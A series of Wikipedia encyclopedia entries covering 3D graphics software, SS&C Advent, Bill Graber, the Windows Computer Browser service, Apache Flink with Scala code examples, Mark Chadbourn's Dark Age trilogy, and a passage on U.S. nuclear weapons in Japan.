|
3D computer graphics software refers to programs used to create 3D computer-generated imagery.
General information
Current software
This table compares elements of notable software that is currently available, based on the raw software without the inclusion of additional plugins.
Inactive software
There are many discontinued software applications.
Operating system support
This table lists the operating systems on which the editors can run natively (without emulation or compatibility layers), that is, the operating systems for which the editors are specifically coded (not, for example, Wings 3D for Windows running on Linux with Wine).
Features
I/O
Image, video, and audio files
general 3D files
Game and renderer files
Cache and animation files
CAD files
Point clouds and photogrammetry files
GIS and DEM files
Supported primitives
Modeling
Lookdev / Shader writing
Lighting
Path-tracing Rendering
Level of Detail (LoD) Generation/Baking
See also
Comparison of raster graphics editors
Comparison of vector graphics editors
Comparison of computer-aided design editors
Comparison of CAD, CAM and CAE file viewers
References
3D computer graphics software
de:3D-Grafik-Software
fr:Logiciel de modélisation 3D
ja:3DCGソフトウェア
ro:Programe de grafică 3D
fi:Luettelo 3D-grafiikkaohjelmista
zh:三维计算机图形软件
|
12583652
|
https://en.wikipedia.org/wiki/SS%26C%20Advent
|
SS&C Advent
|
SS&C Advent (formerly Advent Software) is a business unit of SS&C Technologies.
Advent Software was founded in 1983 by Steve Strand and Stephanie DiMarco. DiMarco served as president and CEO until June 2012, at which point she stepped down and was succeeded by Peter Hess.
On July 8, 2015, Advent Software was acquired by SS&C Technologies and is now known as SS&C Advent.
Corporate identity
Logo design
References
External links
Companies based in San Francisco
Software companies established in 1983
Financial software companies
1983 establishments in California
2015 mergers and acquisitions
Software companies of the United States
Companies established in 1983
1983 establishments in the United States
|
32089562
|
https://en.wikipedia.org/wiki/Bill%20Graber
|
Bill Graber
|
William Noe Graber (January 21, 1911 – March 8, 1996) was an American pole vaulter. He broke the pole vault world record in 1932 and competed at the 1932 and 1936 Olympics, placing fourth and fifth, respectively.
Athletic career
Graber studied at the University of Southern California (USC), where he was coached by Dean Cromwell. As a sophomore in 1931, Graber won the pole vault at the IC4A championships and tied for first at the NCAA championships, helping the USC Trojans to team titles in both meets. At the IC4A meet in Philadelphia the men's pole vault was the last event, and Graber's meeting record of 4.28 m secured the Trojans a narrow victory over Stanford University. Graber was only the fifth athlete in the world to jump 14 feet or more in a competition, and the only one to do so that year. Graber's NCAA jump of 4.22 m was also a meeting record; the Trojans won that team title by a much more comfortable margin, scoring a record number of points and beating Ohio State by 46 points.
Graber repeated as IC4A champion in 1932, although this time he only tied for first. He was unable to defend his NCAA title, as the Trojans did not compete in that meet. The American team for the Olympics in Los Angeles was selected at the Olympic Trials in Palo Alto, with the top three qualifying. Both Graber and Stanford's Bill Miller cleared 4.31 m, a fraction of an inch better than Lee Barnes's world record of 4.30 m. Graber then cleared 4.37 m to obliterate the record; he said afterwards, "it was the first time this year that I have been able to follow one good vault with another." The record established Graber as the leading favorite for the Olympics, but he underperformed and only jumped 4.15 m, placing fourth behind Miller, Japan's Shuhei Nishida and the other American entrant, George Jefferson.
Graber won his third IC4A title in 1933 in a five-way tie for first place. He also tied for first place at the NCAA meet, jumping 4.24 m to break his own meeting record. In 1934 he was national champion indoors and tied for the title outdoors. He almost broke his own world record in April 1935 at Santa Barbara, clearing a bar supposedly set at 4.41 m, but it was subsequently found that the take-off point had been two inches (5 cm) higher than the point of measurement and the record could not be ratified.
Entering the Olympic year of 1936, Graber was considered a leading candidate for his second Olympic Games. At the Olympic Trials at Randalls Island in New York City he cleared 14 ft 3 in (4.34 m), tying for first place with Bill Sefton and Earle Meadows. Meadows and Sefton both being USC undergraduates, it was the first time in the history of the Trials that one university had claimed the top three. George Varoff, who had been the favorite after breaking the world record the previous week, only cleared 14 ft (4.26 m) and didn't qualify for the team.
Graber was again a leading Olympic favorite, but again he failed to medal; at the Olympics he only managed 4.15 m and placed fifth.
References
External links
Profile
1911 births
1996 deaths
Athletes (track and field) at the 1932 Summer Olympics
Athletes (track and field) at the 1936 Summer Olympics
People from Ontario, California
Olympic track and field athletes of the United States
American male pole vaulters
USC Trojans men's track and field athletes
|
20948437
|
https://en.wikipedia.org/wiki/Browser%20service
|
Browser service
|
Browser service or Computer Browser Service is a feature of Microsoft Windows to let users easily browse and locate shared resources in neighboring computers. This is done by aggregating the information in a single computer "Browse Master" (or "Master Browser"). All other computers contact this computer for information and display in the Network Neighborhood window.
The Browser service runs on MailSlot / Server Message Block and thus can be used with all supported transport protocols such as NBF ("NetBEUI"), NBX (IPX/SPX) and NBT (TCP/IP). The Browser service relies heavily on broadcasts, so it is not available across network segments separated by routers. Browsing across different IP subnets needs the help of a Domain Master Browser, which is always the Primary Domain Controller (PDC). Therefore, browsing across IP subnets is not possible in a pure workgroup network.
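The browse list maintained by the master and backup browsers can also be queried programmatically. The following is a minimal sketch, assuming the third-party jCIFS library (a Java CIFS/SMB client that is not part of Windows or of the Browser service itself); listing the smb:// root is jCIFS's convention for enumerating the workgroups and servers advertised through the browse list:

import jcifs.smb.SmbFile

object BrowseNeighborhood {
  def main(args: Array[String]): Unit = {
    // Listing the smb:// root returns the workgroups/domains known to the local master browser
    val root = new SmbFile("smb://")
    for (workgroup <- root.listFiles()) {
      println(s"Workgroup: ${workgroup.getName}")
      // Listing a workgroup returns the browse list of servers collected for that workgroup
      for (server <- workgroup.listFiles())
        println(s"  Server: ${server.getName}")
    }
  }
}

As with the graphical Network Neighborhood, such a listing is only as complete as the browse list itself, so it is subject to the same broadcast and subnet limitations described above.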
In Windows XP
In Windows XP, the Computer Browser service provides backwards compatibility for Windows versions that do not use Active Directory. The service is still needed in XP for My Network Places, Windows Explorer, and the net view command.
Windows NT
Windows NT uses the Computer Browser service to collect and display all computers and other resources on the network. For example, opening Network Neighborhood displays the list of computers, shared folders, and printers; the Computer Browser service manages this list. Every time Windows NT boots up, this service also starts.
Computer Browser is responsible for two closely related services: building a list of available network resources, and sharing this list with other computers. All Windows NT computers run the Computer Browser service, but not all of them are responsible for building the list.
Most computers will only retrieve the list from the computers that actually collect the data and build it. Windows NT computers can therefore have different roles:
Domain master browser: In NT domains, the primary domain controllers (PDCs) handle this role. The PDCs maintain a list of all available network servers located on all subnets in the domain. They get the list for each subnet from the master browser for that subnet. On networks that have only one subnet, the PDC handles both the domain master browser and the master browser roles.
Master browsers: Computers in this role build the browse list for servers on their own subnet and forward the list to the domain master browser and to the backup browsers on their subnet. There is one master browser per subnet.
Backup browsers: These computers distribute the list of available servers from master browsers and send them to individual computers requesting the information. For example, when you open Network Neighborhood, your computer contacts the backup browser and requests the list of all available servers.
Potential browsers: Some computers don't currently maintain the browse list, but they're capable of doing so if necessary, which designates them as potential browsers. If one of the existing browsers fails, potential browsers can take over.
Nonbrowsers: These are computers that aren't capable of maintaining and distributing a browse list.
References
External links
Microsoft: Description of the Microsoft Computer Browser Service
Microsoft: Computer Browser Service Technical Reference
Petri IT Knowledgebase: What’s the Microsoft Computer Browser Service?
Microsoft: Windows NT Browser Service (Chapter 3 of the Networking Guide of the Windows NT Server Resource Kit; for Windows NT 4.0 servers)
Microsoft: Troubleshooting the Microsoft Computer Browser Service (on Windows Server 2003, Windows 2000 and Windows NT 4.0)
Windows services
Local area networks
|
46228433
|
https://en.wikipedia.org/wiki/Apache%20Flink
|
Apache Flink
|
Apache Flink is an open-source, unified stream-processing and batch-processing framework developed by the Apache Software Foundation. The core of Apache Flink is a distributed streaming data-flow engine written in Java and Scala. Flink executes arbitrary dataflow programs in a data-parallel and pipelined (hence task parallel) manner. Flink's pipelined runtime system enables the execution of bulk/batch and stream processing programs. Furthermore, Flink's runtime supports the execution of iterative algorithms natively.
Flink provides a high-throughput, low-latency streaming engine as well as support for event-time processing and state management. Flink applications are fault-tolerant in the event of machine failure and support exactly-once semantics. Programs can be written in Java, Scala, Python, and SQL and are automatically compiled and optimized into dataflow programs that are executed in a cluster or cloud environment.
Flink does not provide its own data-storage system, but provides data-source and sink connectors to systems such as Amazon Kinesis, Apache Kafka, HDFS, Apache Cassandra, and ElasticSearch.
Development
Apache Flink is developed under the Apache License 2.0 by the Apache Flink Community within the Apache Software Foundation. The project is driven by over 25 committers and over 340 contributors.
Overview
Apache Flink's dataflow programming model provides event-at-a-time processing on both finite and infinite datasets. At a basic level, Flink programs consist of streams and transformations. “Conceptually, a stream is a (potentially never-ending) flow of data records, and a transformation is an operation that takes one or more streams as input, and produces one or more output streams as a result.”
Apache Flink includes two core APIs: a DataStream API for bounded or unbounded streams of data and a DataSet API for bounded data sets. Flink also offers a Table API, which is a SQL-like expression language for relational stream and batch processing that can be easily embedded in Flink's DataStream and DataSet APIs. The highest-level language supported by Flink is SQL, which is semantically similar to the Table API and represents programs as SQL query expressions.
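A minimal sketch of the Table API and SQL layers is shown below. It assumes a Scala project with the flink-table dependency on the classpath; the exact package and factory-method names vary between Flink releases, and the PageView type, field names and sample data are illustrative only:

import org.apache.flink.streaming.api.scala._
import org.apache.flink.table.api.scala._

case class PageView(visitor: String, url: String)

object TableApiExample {
  def main(args: Array[String]): Unit = {
    val env = StreamExecutionEnvironment.getExecutionEnvironment
    // Flink 1.9+ Scala bridge; older releases use TableEnvironment.getTableEnvironment(env)
    val tableEnv = StreamTableEnvironment.create(env)

    val views: DataStream[PageView] = env.fromElements(
      PageView("alice", "/home"), PageView("bob", "/home"), PageView("alice", "/cart"))

    // Table API: relational operators embedded in Scala
    val table = tableEnv.fromDataStream(views)
    val perVisitor = table.groupBy('visitor).select('visitor, 'url.count as 'cnt)

    // SQL: the same query expressed as a query string over the (implicitly registered) table
    val perVisitorSql =
      tableEnv.sqlQuery(s"SELECT visitor, COUNT(url) AS cnt FROM $table GROUP BY visitor")

    // Both results are Table objects that can be converted back to data streams and sent to a sink
  }
}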
Programming Model and Distributed Runtime
Upon execution, Flink programs are mapped to streaming dataflows. Every Flink dataflow starts with one or more sources (a data input, e.g., a message queue or a file system) and ends with one or more sinks (a data output, e.g., a message queue, file system, or database). An arbitrary number of transformations can be performed on the stream. These streams can be arranged as a directed, acyclic dataflow graph, allowing an application to branch and merge dataflows.
Flink offers ready-built source and sink connectors with Apache Kafka, Amazon Kinesis, HDFS, Apache Cassandra, and more.
Flink programs run as a distributed system within a cluster and can be deployed in standalone mode as well as on YARN, Mesos, and Docker-based setups, along with other resource-management frameworks.
State: Checkpoints, Savepoints, and Fault-tolerance
Apache Flink includes a lightweight fault-tolerance mechanism based on distributed checkpoints. A checkpoint is an automatic, asynchronous snapshot of the state of an application and of the position in a source stream. In the case of a failure, a Flink program with checkpointing enabled will, upon recovery, resume processing from the last completed checkpoint, ensuring that Flink maintains exactly-once state semantics within an application. The checkpointing mechanism also exposes hooks for application code to include external systems in checkpoints (for example, opening and committing transactions with a database system).
Flink also includes a mechanism called savepoints, which are manually triggered checkpoints. A user can generate a savepoint, stop a running Flink program, then resume the program from the same application state and position in the stream. Savepoints enable updates to a Flink program or a Flink cluster without losing the application's state. As of Flink 1.2, savepoints also allow an application to be restarted with a different parallelism, letting users adapt to changing workloads.
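A minimal sketch of how checkpointing is switched on, assuming the Scala DataStream API used in the word-count example below; the checkpoint interval, job name, and trivial pipeline here are illustrative rather than taken from the Flink documentation:
import org.apache.flink.streaming.api.CheckpointingMode
import org.apache.flink.streaming.api.scala._

object CheckpointedJob {
  def main(args: Array[String]): Unit = {
    val env = StreamExecutionEnvironment.getExecutionEnvironment

    // Take an automatic, asynchronous snapshot of operator state every 10 seconds.
    env.enableCheckpointing(10000)

    // Exactly-once state semantics (the default mode), made explicit here.
    env.getCheckpointConfig.setCheckpointingMode(CheckpointingMode.EXACTLY_ONCE)

    // A trivial pipeline so the sketch is runnable; a real job would read from a durable source.
    env.fromElements(1, 2, 3, 4, 5)
      .map(_ * 2)
      .print()

    env.execute("Checkpointed Job")
  }
}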
DataStream API
Flink's DataStream API enables transformations (e.g. filters, aggregations, window functions) on bounded or unbounded streams of data. The DataStream API includes more than 20 different types of transformations and is available in Java and Scala.
A simple example of a stateful stream processing program is an application that emits a word count from a continuous input stream and groups the data in 5-second windows:

import org.apache.flink.streaming.api.scala._
import org.apache.flink.streaming.api.windowing.time.Time

case class WordCount(word: String, count: Int)

object WindowWordCount {
  def main(args: Array[String]) {

    val env = StreamExecutionEnvironment.getExecutionEnvironment
    val text = env.socketTextStream("localhost", 9999)

    val counts = text.flatMap { _.toLowerCase.split("\\W+") filter { _.nonEmpty } }
      .map { WordCount(_, 1) }
      .keyBy("word")
      .timeWindow(Time.seconds(5))
      .sum("count")

    counts.print

    env.execute("Window Stream WordCount")
  }
}
Apache Beam - Flink Runner
Apache Beam “provides an advanced unified programming model, allowing (a developer) to implement batch and streaming data processing jobs that can run on any execution engine.” The Apache Flink-on-Beam runner is the most feature-rich according to a capability matrix maintained by the Beam community.
data Artisans, in conjunction with the Apache Flink community, worked closely with the Beam community to develop a Flink runner.
DataSet API
Flink's DataSet API enables transformations (e.g., filters, mapping, joining, grouping) on bounded datasets. The DataSet API includes more than 20 different types of transformations. The API is available in Java, Scala and an experimental Python API. Flink's DataSet API is conceptually similar to the DataStream API.
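As an illustration of the batch side, a minimal word count in the DataSet API might look like the following sketch, written in the same Scala style as the streaming example above; the in-memory input strings are placeholders:
import org.apache.flink.api.scala._

object BatchWordCount {
  def main(args: Array[String]): Unit = {
    // ExecutionEnvironment is the DataSet counterpart of StreamExecutionEnvironment.
    val env = ExecutionEnvironment.getExecutionEnvironment

    // A small in-memory data set; in practice the input would usually come from a file or other source.
    val text = env.fromElements("to be or not to be", "that is the question")

    val counts = text
      .flatMap { _.toLowerCase.split("\\W+").filter(_.nonEmpty) }
      .map { (_, 1) }
      .groupBy(0) // group by the word (field 0 of the tuple)
      .sum(1)     // sum the counts (field 1 of the tuple)

    // print() acts as a sink and also triggers execution of the batch program.
    counts.print()
  }
}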
Table API and SQL
Flink's Table API is a SQL-like expression language for relational stream and batch processing that can be embedded in Flink's Java and Scala DataSet and DataStream APIs. The Table API and SQL interface operate on a relational Table abstraction. Tables can be created from external data sources or from existing DataStreams and DataSets. The Table API supports relational operators such as selection, aggregation, and joins on Tables.
Tables can also be queried with regular SQL. The Table API and SQL offer equivalent functionality and can be mixed in the same program. When a Table is converted back into a DataSet or DataStream, the logical plan, which was defined by relational operators and SQL queries, is optimized using Apache Calcite and is transformed into a DataSet or DataStream program.
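A sketch of moving between the DataStream, Table, and SQL layers in Scala, assuming a Flink 1.13+-style TableEnvironment; the exact bridge APIs have changed across Flink versions, and the class, view, and job names here are illustrative:
import org.apache.flink.streaming.api.scala._
import org.apache.flink.table.api.Table
import org.apache.flink.table.api.bridge.scala._

case class WordCount(word: String, count: Int)

object TableWordCount {
  def main(args: Array[String]): Unit = {
    val env = StreamExecutionEnvironment.getExecutionEnvironment
    val tableEnv = StreamTableEnvironment.create(env)

    // A small in-memory stream of case-class records.
    val wordCounts: DataStream[WordCount] = env.fromElements(
      WordCount("flink", 1), WordCount("table", 1), WordCount("flink", 1))

    // Register the DataStream as a view so it can be queried with SQL.
    tableEnv.createTemporaryView("WordCounts", wordCounts)

    // Express the relational logic through the SQL interface...
    val viaSql: Table = tableEnv.sqlQuery(
      "SELECT word, SUM(`count`) AS total FROM WordCounts GROUP BY word")

    // ...and convert the result back into a DataStream of rows for further processing.
    tableEnv.toChangelogStream(viaSql).print()

    env.execute("Table API and SQL sketch")
  }
}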
Flink Forward
Flink Forward is an annual conference about Apache Flink. The first edition of Flink Forward took place in 2015 in Berlin. The two-day conference had over 250 attendees from 16 countries. Sessions were organized in two tracks with over 30 technical presentations from Flink developers and one additional track with hands-on Flink training.
In 2016, 350 participants joined the conference and over 40 speakers presented technical talks in 3 parallel tracks. On the third day, attendees were invited to participate in hands-on training sessions.
In 2017, the event expanded to San Francisco as well. The conference days are dedicated to technical talks on how Flink is used in the enterprise, Flink system internals, ecosystem integrations with Flink, and the future of the platform. It features keynotes, talks from Flink users in industry and academia, and hands-on training sessions on Apache Flink.
In 2020, following the COVID-19 pandemic, Flink Forward's spring edition, which was supposed to be hosted in San Francisco, was canceled. Instead, the conference was hosted virtually, starting on April 22 and concluding on April 24, featuring live keynotes, Flink use cases, Apache Flink internals, and other topics on stream processing and real-time analytics.
History
In 2010, the research project "Stratosphere: Information Management on the Cloud" led by Volker Markl (funded by the German Research Foundation (DFG)) was started as a collaboration of Technical University Berlin, Humboldt-Universität zu Berlin, and Hasso-Plattner-Institut Potsdam. Flink started from a fork of Stratosphere's distributed execution engine and it became an Apache Incubator project in March 2014. In December 2014, Flink was accepted as an Apache top-level project.
Release Dates
09/2021: Apache Flink 1.14 (09/2021: v1.14.0; 12/2021: v1.14.2; 01/2022: v1.14.3)
05/2021: Apache Flink 1.13 (05/2021: v1.13.1; 08/2021: v1.13.2; 10/2021: v1.13.3; 12/2021: v1.13.5)
12/2020: Apache Flink 1.12 (01/2021: v1.12.1; 03/2021: v1.12.2; 04/2021: v1.12.3; 05/2021: v1.12.4; 08/2021: v1.12.5; 12/2021: v1.12.7)
07/2020: Apache Flink 1.11 (07/2020: v1.11.1; 09/2020: v1.11.2; 12/2020: v1.11.3; 08/2021: v1.11.4; 12/2021: v1.11.6)
02/2020: Apache Flink 1.10 (05/2020: v1.10.1; 08/2020: v1.10.2; 01/2021: v1.10.3)
08/2019: Apache Flink 1.9 (10/2019: v1.9.1; 01/2020: v1.9.2)
04/2019: Apache Flink 1.8 (07/2019: v1.8.1; 09/2019: v1.8.2; 12/2019: v1.8.3)
11/2018: Apache Flink 1.7 (12/2018: v1.7.1; 02/2019: v1.7.2)
08/2018: Apache Flink 1.6 (09/2018: v1.6.1; 10/2018: v1.6.2; 12/2018: v1.6.3; 02/2019: v1.6.4)
05/2018: Apache Flink 1.5 (07/2018: v1.5.1; 07/2018: v1.5.2; 08/2018: v1.5.3; 09/2018: v1.5.4; 10/2018: v1.5.5; 12/2018: v1.5.6)
12/2017: Apache Flink 1.4 (02/2018: v1.4.1; 03/2018: v1.4.2)
06/2017: Apache Flink 1.3 (06/2017: v1.3.1; 08/2017: v1.3.2; 03/2018: v1.3.3)
02/2017: Apache Flink 1.2 (04/2017: v1.2.1)
08/2016: Apache Flink 1.1 (08/2016: v1.1.1; 09/2016: v1.1.2; 10/2016: v1.1.3; 12/2016: v1.1.4; 03/2017: v1.1.5)
03/2016: Apache Flink 1.0 (04/2016: v1.0.1; 04/2016: v1.0.2; 05/2016: v1.0.3)
11/2015: Apache Flink 0.10 (11/2015: v0.10.1; 02/2016: v0.10.2)
06/2015: Apache Flink 0.9 (09/2015: v0.9.1)
04/2015: Apache Flink 0.9-milestone-1
Apache Incubator Release Dates
01/2015: Apache Flink 0.8-incubating
11/2014: Apache Flink 0.7-incubating
08/2014: Apache Flink 0.6-incubating (09/2014: v0.6.1-incubating)
05/2014: Stratosphere 0.5 (06/2014: v0.5.1; 07/2014: v0.5.2)
Pre-Apache Stratosphere Release Dates
01/2014: Stratosphere 0.4 (version 0.3 was skipped)
08/2012: Stratosphere 0.2
05/2011: Stratosphere 0.1 (08/2011: v0.1.1)
The 1.14.1, 1.13.4, 1.12.6, and 1.11.5 releases, which were supposed to contain only a Log4j upgrade to 2.15.0, were skipped because a further vulnerability in that Log4j version was discovered during the release publication.
See also
List of Apache Software Foundation projects
References
External links
Flink
Free software programmed in Java (programming language)
Software using the Apache license
Free system software
Distributed stream processing
Articles with example Scala code
|
4839143
|
https://en.wikipedia.org/wiki/The%20Dark%20Age%20%28series%29
|
The Dark Age (series)
|
The Dark Age is a trilogy by Mark Chadbourn set around the beginning of the third millennium. While the previous series was a clear fantasy story, this has strings of gothic horror and existentialism woven into it.
The three books are:
The Devil in Green (2002)
The Queen of Sinister (2004)
The Hounds of Avalon (2005)
Although not a direct sequel to The Age of Misrule, it is a continuation of the world established by the end of that trilogy, the events of which are referred to as the Fall. It is followed by the Kingdom of the Serpent.
At first the books appear to be standalone novels; ultimately, however, they weave together to form one larger story, as sub-plots and themes coalesce in the final book, and only by reading that can the reader see how it all holds together. They do not need to be read in order of publication, although The Hounds of Avalon does bring together the characters from the other two and is set after the events of The Queen of Sinister and The Devil in Green.
This trilogy fits into a much bigger jigsaw, a sprawling story that covers two thousand years of history, multiple mythologies and two worlds, through The Age of Misrule and the Kingdom of the Serpent; again, the stories stand separately, but a greater perception comes from reading them all.
The Devil in Green has been described as "a sumptuous feast of fairytale, magic, dark gothic horror and romance."
Throughout his books Chadbourn buries archetypes, specifically those of Jung, to get across his ideas and tap into the subconscious. He has the Hero, the Great Mother, the Wise Old Man, the Trickster and the Child subtly underpinning his characters, but he makes sure his characters are real and flawed. His heroes are not stereotypical high-born achievers but ordinary individuals from normal or hard backgrounds.
When interviewed about this series he has said:
Plot introduction and setting
The trilogy is set in Britain and the Otherworld, or Far Lands. Technology is failing and magic has returned, along with armies of mythical creatures and Faerie folk from the Otherworld. Everyday people face the hardships of living in a world with little law and order, poor communications and a Government that is struggling to maintain power. Travelling is fraught with the danger of attack from creatures and monsters from the Otherworld. Within the cities gangs rule, and it is never safe to venture out after dark.
Mark Chadbourn uses the gods of Celtic mythology, referred to as the Tuatha Dé Danann, within his books, along with the idea that ley lines and ancient sites such as Stonehenge are connections to, and areas of, the Earth's energy, which he calls the Blue Fire. The ancient sites act as gateways to the Otherworld. He draws on the theories of brane cosmology to create a multiverse, where time in one dimension moves at a different rate from another; one hour in our world could be days or weeks in another.
Plot summary
The Devil in Green
The Devil in Green centres on Mallory, a recently recruited Knight Templar based at Salisbury Cathedral, his comrades, and his relationship with a new-age traveller and Wiccan called Sophie. The Knights Templar and the remnants of the Christian Church are trying to restore some form of order within their sphere of the world.
During a mission to rescue a vicar, Mallory finds himself in one of the courts of the Otherworld, where he learns of his destiny as a Brother of Dragons: one of five chosen by Existence to help restore the balance of light and dark in our world.
He returns to Salisbury to discover that supernatural forces have surrounded the Cathedral and laid siege to it. The priests become more fundamentalist after their leader is killed mysteriously and a sacred artefact with alleged powers is recovered.
It falls to Mallory, with the help of Sophie, to end the siege and overthrow the fundamentalist priests. During the siege his friend, Miller, is nearly crucified but is saved when Cernunnos places a fabulous beast hatchling within him, infusing him with the Blue Fire. This leaves Miller with the ability to heal the sick. The story concludes with Mallory and Sophie heading off in search of their fellow Brothers and Sisters of Dragons.
The title refers to Cernunnos: although he is worshipped by the pagans as a nature god and part of life, the Christians portray him as the Devil; hence, 'the Devil in Green'.
The Queen of Sinister
An incurable plague is sweeping the country. Caitlin Shepherd, a local GP, is working all hours to do what she can in her community. Caitlin's husband and young son succumb and die. Overcome by grief, Caitlin thinks she cannot continue, but is helped by her friend Mary, the local herbalist. Mary is visited by an old professor named Crowther, who says Caitlin is a Sister of Dragons and that she must find a cure for the plague in the Otherworld. Caitlin goes with Crowther, meeting up with three others: Mahalia, a teenage girl; Carlton, a mute boy; and lastly Matt, who is looking for his missing daughter.
Whilst in the court of Lugh in the Otherworld they rescue Jack, a teenager from our world who was taken as a baby by the Tuatha Dé Danann during The Age of Misrule. He has had a powerful weapon known as a Wish Hex placed within him.
Caitlin is suffering from multiple personality disorder. Inside her mind are also Briony, Brigid, Amy, and a fourth persona that the others are terrified of. As Caitlin's group continue on their quest, Mary discovers that Caitlin is in danger and sets off to help her. On the group's journey to the House of Pain, the source of the plague, they are attacked and Caitlin is thrown back into our world, ending up in Birmingham.
Here we meet Thackery and Harvey, struggling to survive against the local gang, who are killing plague victims. Life is bleak within the city and little hope remains. Thackery finds and takes care of Caitlin, who has retreated into herself and is non-communicative.
Thackery is captured by the gang but rescued by Caitlin, whose hidden persona emerges as the Morrigan. Caitlin, as the Morrigan, continues to the House of Pain. Once there she is given the choice to remain as its queen, with her son, in exchange for giving up being a Sister of Dragons, the fight for Existence, and a cure for the plague.
Meanwhile, Mary's quest reaches its conclusion and she must confront her past in order to help save Caitlin. This she achieves: the plague is stopped, and the story concludes with Mahalia, Jack and Crowther heading off into the Otherworld, and Caitlin no longer tied to the House of Pain, but also no longer a Sister of Dragons nor the Morrigan's host. Her son is now free to pass on to the Afterlife with her husband. Thackery and Harvey follow her to the House of Pain and leave it with her.
The title of the book refers to the position Caitlin is offered in her deal to save her son.
The Hounds of Avalon
This story is set mainly in Oxford where the Government is trying to restore law and order after the Fall.
Hunter, a Government special forces agent, and his friend Hal, a Government office clerk, are the central characters, who find themselves Brothers of Dragons up against a dark power, the Void, which wants to stamp out all of Existence.
The Government want to round up the Brothers and Sisters of Dragons for their own ends, and this leads Hunter to capture Mallory and gets Sophie shot. Believing her dead, Mallory escapes with Hunter to seek out the remaining original Brothers and Sisters of Dragons.
Hal keeps his identity as a Brother of Dragons secret but goes on his own mission to find out what he can to help the fight against the Void. He has several encounters with creatures from the Otherworld.
Sophie is not dead but ends up in the Far Lands where she joins Caitlin Shepherd, no longer a Sister of Dragons. Caitlin regains the Morrigan and the two help Lugh and his court escape a siege before returning to Oxford.
During the final battle against the Void's army, Hal is accused of killing the Prime Minister. This is a ruse by the Government to get all the Brothers and Sisters together in order to sacrifice them to the Void. The Government want law and order restored and see the unpredictability that magic and the Brothers and Sisters of Dragons offer as a threat to this.
The Void regains control, people return to their mundane, ordinary lives, and the world reverts to how it was before The Age of Misrule.
Hal escapes The Void and enters the Blue Fire to travel through time and set in motion events to bring back the original leader of the Brothers and Sisters of Dragons, Jack Churchill, as Existence's last hope in the battle with the Void.
The title of the book refers to the Hounds of Avalon, whose baying, once heard, indicates the end of the world.
Characters in "The Dark Age Trilogy"
Brothers and Sisters of Dragons:
Mallory is the first Brother of Dragons during the Dark Age. A cynical man, he was once a student of the Classics. The Tuatha call him the Dead Man, on account of him killing himself in another dimension and awakening in ours. His past troubles him and he resents authority.
Sophie Tallant is a priestess for a group called the New Celtic Nation, and becomes close to Mallory. She practises her craft and is able to visit Mallory in his dreams. She has strong beliefs and will stand up for them.
Caitlin Shepherd is a country GP. The death of her husband and son fractures her mind and she struggles to keep control of her multiple personalities. The Tuatha call her the Broken Woman.
Hunter is a Special Ops field leader for the remains of the SBS. He is tough, sharp-talking, and a bit of a ladies' man. He appears to take his brutal work in his stride but in reality remembers all the faces of those he has killed. His best friend is Hal.
Hal is a silent office-drone in the reconstituted British government. Withdrawn, his role in the coming conflict is discovered at the very end. He is full of self-doubt, but is good at problem solving. The Tuatha call him the Shadow Mage.
Other important humans:
Jez Miller is Mallory's main friend in the Knights Templar. He joined because he believes in their cause and faith. He is naive and sees the good in everyone.
Mary is an old witch and herbalist who knows Caitlin. Self-loathing and alcoholic, she sees Caitlin as a daughter and makes her own sacrifice to bring the Goddess (the sacred feminine) back to the world.
Jack is a teenager who has spent most of his life a prisoner of the Tuatha Dé Danann and been subjected to various experiments. He helps Caitlin and company escape from Lugh's court after they release him from his cell.
Celtic gods (the Tuatha Dé Danann) and Courts:
Cernunnos, one of the most powerful gods, appears in The Devil in Green to aid Mallory and again in The Hounds of Avalon. His other half is the triple goddess. He leads the Wild Hunt, which, once called, cannot be stopped until a kill has been made.
The triple Goddess, or Mother, Maiden and Crone, is searched for in The Queen of Sinister, and one of her aspects, the Morrigan, is key to Caitlin's survival.
Rhiannon is queen of the Court of Peaceful Days. Mallory ends up there after being attacked on Salisbury Plain. Though this court has renounced violence, Rhiannon gives Mallory the sword of Llyrwyn.
Lugh rules the Court of Soul's Ease. His court is the first Caitlin enters in the Queen of Sinister. Initially he is diminished because he no longer fights for Existence, but this changes and he fights in the final battle in the Hounds of Avalon.
Dian Cecht rules the Court of the Final Word. Here experiments on humans are carried out, and this is where Jack spent much of his life. Dian Cecht is the great healer of the Tuatha. Like many of the Tuatha he can appear cold and aloof but is fascinated by humans, or Fragile Creatures as the Tuatha refer to them.
Math lives in a tower in the court of Soul's Ease. He wears a mask of four different animals: a boar, a falcon, a salmon and a bear. Caitlin and Sophie approach him for aid in Hounds of Avalon.
Major themes
General themes of the trilogy are the core issues of our own Dark Ages - faith, plague/illness, war/politics. The books strip away the trappings of modern society to see how we would cope against the great challenges of life without our support network.
The books look at the fallibility of human nature, and at what can happen when different beliefs clash. They also question the wisdom of allowing those who seek power to attain it.
The idea of an Afterlife is also included.
Awards and nominations
All three books were shortlisted for the British Fantasy Society's August Derleth Award for Best Novel, the first time three books from a single trilogy had been shortlisted.
Publication history
The Devil In Green (The Dark Age book I) Gollancz (UK) October 2002
The Queen of Sinister (The Dark Age book II) Gollancz (UK) March 2004
The Hounds of Avalon (The Dark Age book III) Gollancz (UK) April 2005
Sources, references, external links, reviews
An interview with Mark Chadbourn on the subject of his work
Chadbourn's website
The SF Site Reviews
Fantasy novel series
Novels by Mark Chadbourn
|
53513370
|
https://en.wikipedia.org/wiki/U.S.%20nuclear%20weapons%20in%20Japan
|
U.S. nuclear weapons in Japan
|
United States nuclear weapons were stored secretly at bases throughout Japan following World War II. Secret agreements between the two governments allowed nuclear weapons to remain in Japan until 1972, to move through Japanese territory, and for the return of the weapons in time of emergency.
Nuclear war planning
In the 1950s, after U.S. interservice rivalry culminated in the "Revolt of the Admirals", a stop-gap method of naval deployment of nuclear weapons was developed using the Lockheed P-2 Neptune and North American AJ-2 Savage aboard aircraft carriers. Forrestal-class aircraft carriers with jet bombers, as well as missiles with miniaturized nuclear weapons, soon entered service, and regular transits of U.S. nuclear weapons through Japan began thereafter.
U.S. leaders contemplated the first use of nuclear weapons, including those based in Japan following the intervention by the People's Republic of China during the Korean War. A command-and-control team was then established in Tokyo by Strategic Air Command and President Truman authorized the transfer to Okinawa of atomic-capable B-29s armed with Mark 4 nuclear bombs and nine fissile cores into the custody of the U.S. Air Force.
The runways at Kadena were upgraded for Convair B-36 Peacemaker use. Reconnaissance RB-36s were deployed to Yokota Air Base in late 1952. Boeing B-50 Superfortress and Convair B-36 Peacemaker bombers were deployed to Japan and Okinawa in August 1953 to join B-29s already based there.
Following the Korean War, U.S. nuclear weapons based in the region were considered for Operation Vulture to support French military forces in Vietnam.
